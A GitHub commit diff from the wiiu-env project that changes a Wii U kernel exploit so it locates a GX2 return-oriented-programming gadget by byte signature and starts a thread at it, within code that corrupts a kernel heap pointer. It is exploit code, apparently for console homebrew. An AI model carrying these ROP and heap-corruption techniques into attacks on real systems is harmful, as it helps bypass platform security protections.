find the gx2 rop gadget properly

wiiu-env · Jul 25, 2019 · 43ff7b2 · 43ff7b2
1 parent d8f873b
commit 43ff7b2
Showing 1 changed file with 3 additions and 1 deletion.
diff --git a/kexploit.c b/kexploit.c
@@ -86,14 +86,16 @@ void run_kexploit(uint32_t coreinit_handle){
     uint32_t r30r31load_addr = (uint32_t) find_gadget(r30r31load, 0x18, 0x01000000);
     uint32_t doflush[] = {0xba810008, 0x8001003c, 0x7c0803a6, 0x38210038, 0x4e800020, 0x9421ffe0, 0xbf61000c, 0x7c0802a6, 0x7c7e1b78, 0x7c9f2378, 0x90010024};
     uint32_t doflush_addr = (uint32_t) find_gadget(doflush, 0x2C, 0x01000000) + 0x14 + 0x18;
+    uint32_t gx2rop[] = {0x819A0004, 0x55800036, 0x7C006040, 0x40820054, 0x2C190000, 0x4182004C, 0x2C1F0000, 0x40820044, 0x2C1D0000, 0x4182003C, 0x2C1E0000};
+    uint32_t gx2rop_addr = (uint32_t) find_gadget(gx2rop, 0x2C, 0x01000000);
 
     /* Modify a next ptr on the heap */
     uint32_t kpaddr = KERN_HEAP_PHYS + STARTID_OFFSET;
 
     /* Make a thread to modify the semaphore */
     OSContext *thread = (OSContext*)MEMAllocFromDefaultHeapEx(0x1000, 8);
     uint32_t *stack = (uint32_t*)MEMAllocFromDefaultHeapEx(0xA0, 0x20);
-    if (!OSCreateThread(thread, (void*)0x11a1dd8, 0, NULL, ((uint32_t)stack) + 0xA0, 0xA0, 0, 0x1 | 0x8)) {
+    if (!OSCreateThread(thread, (void*)gx2rop_addr, 0, NULL, ((uint32_t)stack) + 0xA0, 0xA0, 0, 0x1 | 0x8)){
         OSFatal("Failed to create thread");
     }